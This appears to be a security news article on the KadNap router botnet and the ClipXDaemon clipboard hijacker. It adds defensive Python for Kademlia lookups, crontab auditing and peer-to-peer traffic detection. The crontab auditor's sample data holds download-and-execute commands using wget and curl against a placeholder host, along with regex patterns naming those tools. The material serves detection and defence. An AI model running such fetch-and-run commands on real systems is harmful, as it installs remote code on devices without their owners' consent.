KadNap Malware Infects 14,000 Edge Devices
KadNap malware has infected 14,000 edge devices in a growing cyber campaign. Researchers recently uncovered this new threat, which mainly targets network edge devices.
Most infections involve routers used in homes and small offices, so many victims may not notice the compromise. Reports show that more than 60% of infected devices are located in the United States, but infections also appear in other regions, including Taiwan, Hong Kong, and multiple European countries. The campaign therefore spans a global network.
Routers Become Part of a Hidden Botnet
KadNap primarily targets routers made by ASUS, but attackers also infect other edge networking devices, so many different kinds of systems join the malicious network.
Once infected, the devices become part of a proxy botnet that routes the attackers' malicious traffic through victim devices, hiding the criminals' real locations. Access to the botnet is later sold through a proxy service; one such service, Doppelgänger, markets these infected devices and claims to offer anonymous proxies in dozens of countries.
Peer-to-Peer Technology Hides the Attack
The malware uses the Kademlia Distributed Hash Table (DHT) protocol. This peer-to-peer design hides the command infrastructure, so defenders struggle to trace the attackers. Instead of contacting a single server, infected devices connect to other infected nodes, which share information within the network. As a result, the botnet is harder to disrupt.
Researchers say this design helps the malware evade traditional monitoring tools: its traffic looks similar to normal peer-to-peer activity, so many systems overlook the malicious communication.
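To make the "no single server" point concrete, here is an added example (not code from the report or from the malware) of the two operations every Kademlia node performs: the XOR distance metric and the selection of the k closest known nodes to a target ID. Because every peer derives the same "closest" set from its own routing table, there is no fixed address a defender can block to cut the network off; the node IDs below are small constructed integers for readability, and Kademlia's real IDs are 160-bit hashes.

```python
import hashlib
from typing import List

ID_BITS = 160  # Kademlia uses 160-bit node identifiers


def node_id(seed: str) -> int:
    """Derive a 160-bit node ID from an arbitrary seed (demo only; real
    implementations use a random or hash-derived ID of the same width)."""
    return int.from_bytes(hashlib.sha1(seed.encode()).digest(), "big")


def xor_distance(a: int, b: int) -> int:
    """Kademlia's metric: distance is the XOR of the two IDs interpreted as
    an integer. It is symmetric and d(a, a) == 0, which is what lets each
    node compute the same ordering independently."""
    return a ^ b


def bucket_index(self_id: int, other_id: int) -> int:
    """Index of the k-bucket in which `self_id` would store `other_id`:
    the position of the highest differing bit (-1 for the node itself)."""
    return xor_distance(self_id, other_id).bit_length() - 1


def k_closest(target: int, known: List[int], k: int = 3) -> List[int]:
    """Return the k known node IDs closest to `target` under the XOR
    metric; this is the lookup step that replaces 'ask the C2 server'."""
    return sorted(known, key=lambda n: xor_distance(target, n))[:k]


if __name__ == "__main__":
    # Constructed 4-bit IDs so the arithmetic is easy to follow by hand.
    known = [0b1010, 0b1011, 0b0110, 0b1111]
    target = 0b1000
    for n in known:
        print(f"{n:04b} distance {xor_distance(target, n):2d}")
    print("closest:", [f"{n:04b}" for n in k_closest(target, known)])
```

From a defender's perspective the takeaway is the opposite of "block the server": detection has to key on the behaviour (many short-lived connections to many peers, fan-out from a router that should only talk to a few upstream services) rather than on any single destination.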
Infection Chain and Persistence
The infection begins with a shell script downloaded from a command server. This script starts the botnet enrollment process, and the victim rarely notices the activity. The script creates a scheduled task on the router so that it runs again automatically every hour, which keeps the malware active.
The script then downloads a malicious executable, renames it, and launches it silently. At that point KadNap is fully operational.
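The persistence mechanism described above (a scheduled task that re-runs hourly and fetches and executes remote content) is something an administrator can audit directly on a router that exposes `crontab -l` or a cron directory. The following is an added example, not code from the report or from any vendor: it parses crontab text and flags entries that combine a downloader with an execution step, noting when they are scheduled hourly or more often. The sample crontab and its URLs are constructed for the demo and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample crontab (not a real IoC): two benign jobs plus two
# download-and-execute jobs of the kind used for hourly persistence.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /sbin/logrotate.sh
*/15 * * * * /usr/sbin/ntpclient -s -h pool.ntp.org
30 * * * * wget -q -O /tmp/.x http://example.invalid/update.sh && sh /tmp/.x
0 * * * * curl -s http://example.invalid/a.sh | sh
"""

# Tools that fetch remote content on typical embedded Linux.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# Piping into a shell, chaining into a shell or chmod, or staging in /tmp.
EXECUTORS = re.compile(
    r"(\|\s*(sh|bash|ash)\b|&&\s*(sh|bash|ash|chmod\s+\+?x)\b|/tmp/|/var/tmp/)"
)


@dataclass
class Finding:
    line: str
    reasons: List[str] = field(default_factory=list)


def audit_crontab(text: str) -> List[Finding]:
    """Return crontab entries that both fetch remote content and execute it.
    Hourly-or-faster scheduling is recorded as an extra reason, not a
    requirement, so a daily download-and-run job is still reported."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:          # not a "m h dom mon dow command" entry
            continue
        schedule, command = fields[:5], fields[5]
        reasons = []
        if schedule[1] == "*":       # hour field unrestricted: runs every hour or more often
            reasons.append("runs hourly or more often")
        fetches = DOWNLOADERS.search(command) is not None
        executes = EXECUTORS.search(command) is not None
        if fetches:
            reasons.append("fetches remote content")
        if executes:
            reasons.append("executes fetched content or stages it in a temp path")
        if fetches and executes:
            findings.append(Finding(line, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f.line)
        for r in f.reasons:
            print("   -", r)
```

Run it against the output of `crontab -l` (or the contents of `/etc/crontabs/` on BusyBox-based firmware). A hit is a triage signal rather than proof of infection: compare the flagged command with the vendor's known update jobs before acting on it.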
Device Information and Network Control
KadNap collects system details from infected devices, for example system uptime and the current time, which it uses to generate unique identifiers.
The malware then connects to other peers in the network and receives commands or additional files from those nodes, which is how the attackers keep control of the botnet. Some scripts also close SSH port 22 on the device, preventing other users from accessing the router and giving the attackers exclusive control.
Proxy Network Used for Cybercrime
Researchers found that the proxy network is already active and that threat actors are using it to route malicious activity, but identifying the exact criminals remains difficult.
Some devices may also carry other malware, so multiple groups may share the same infrastructure, which complicates attribution. Experts warn that decentralized botnets are increasingly common; because they resist takedown attempts, they remain active for long periods.
Researchers also reported another Linux-based threat, ClipXDaemon, which targets cryptocurrency users.
This malware monitors the clipboard continuously, and when a user copies a wallet address it replaces it with another address, so the payment goes to the attackers. The malware runs mostly in memory to avoid detection and disguises itself as a normal system process, so many users never notice the attack.
How to Prevent Router and Malware Attacks
Users should update router firmware regularly, but many devices run outdated software for years, which makes them easy to exploit.
Organizations should monitor network devices for unusual connections. Managed detection and response services can also detect suspicious traffic from compromised routers, and regular vulnerability assessments help identify weak edge devices before attackers exploit them.
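"Monitor network devices for unusual connections" can be turned into a concrete check. The following added example (not code from the report or from any product) scores each edge device in a set of flow records by how many distinct peers it talks to and what share of those connections go to high ports, the fan-out pattern a DHT participant produces and a home router normally does not. The flow records are constructed sample data; the thresholds are starting points to tune against your own baseline, not values from the report.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Flow(NamedTuple):
    src: str    # the edge device (router) that originated the connection
    dst: str    # remote peer
    dport: int  # destination port
    proto: str


def sample_flows() -> List[Flow]:
    """Constructed sample flows (not captured traffic): one router doing
    ordinary DNS/NTP/HTTPS, one fanning out to 30 peers on high UDP ports."""
    flows = [
        Flow("192.0.2.1", "203.0.113.53", 53, "udp"),
        Flow("192.0.2.1", "203.0.113.123", 123, "udp"),
        Flow("192.0.2.1", "203.0.113.10", 443, "tcp"),
        Flow("192.0.2.1", "203.0.113.11", 443, "tcp"),
    ]
    for i in range(30):
        flows.append(Flow("192.0.2.2", f"198.51.100.{i + 1}", 20000 + 37 * i, "udp"))
    flows.append(Flow("192.0.2.2", "203.0.113.53", 53, "udp"))
    return flows


def p2p_like_devices(
    flows: List[Flow],
    min_peers: int = 20,
    min_high_port_ratio: float = 0.8,
    high_port: int = 1024,
) -> Dict[str, dict]:
    """Per source device: distinct peer count, fraction of connections to
    ports >= high_port, and a 'suspicious' verdict when both exceed the
    thresholds. Legitimate P2P traffic (file sharing, some VoIP) will also
    trigger this, so treat the verdict as a triage signal."""
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)
    verdicts: Dict[str, dict] = {}
    for src, fl in by_src.items():
        peers = {f.dst for f in fl}
        high = sum(1 for f in fl if f.dport >= high_port)
        ratio = high / len(fl)
        verdicts[src] = {
            "peers": len(peers),
            "high_port_ratio": round(ratio, 2),
            "suspicious": len(peers) >= min_peers and ratio >= min_high_port_ratio,
        }
    return verdicts


if __name__ == "__main__":
    for device, v in p2p_like_devices(sample_flows()).items():
        flag = "SUSPICIOUS" if v["suspicious"] else "ok"
        print(f"{device}: {v['peers']} peers, high-port ratio {v['high_port_ratio']} -> {flag}")
```

Feed it NetFlow/IPFIX or firewall connection logs aggregated per device over a window of an hour or so; a router that should only talk to DNS, NTP, its ISP and a handful of cloud services has no reason to open dozens of sessions to unrelated addresses on ephemeral ports.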